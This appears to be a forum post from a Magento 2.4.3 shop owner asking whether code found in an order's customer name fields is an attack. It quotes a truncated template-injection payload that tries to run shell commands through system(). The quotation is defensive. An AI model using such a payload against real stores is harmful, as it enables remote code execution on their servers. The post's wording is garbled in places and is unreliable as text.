Code in place of customer name – Is this an attack…

Hello all

I not too long ago had an order come by way of the place code had been inserted into the shopper first title and second dame.

This code was:

{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cd${IFS%??}/


Is that this an tried assault?

What validation does Magento 2.4.3 CE present to dam code injection?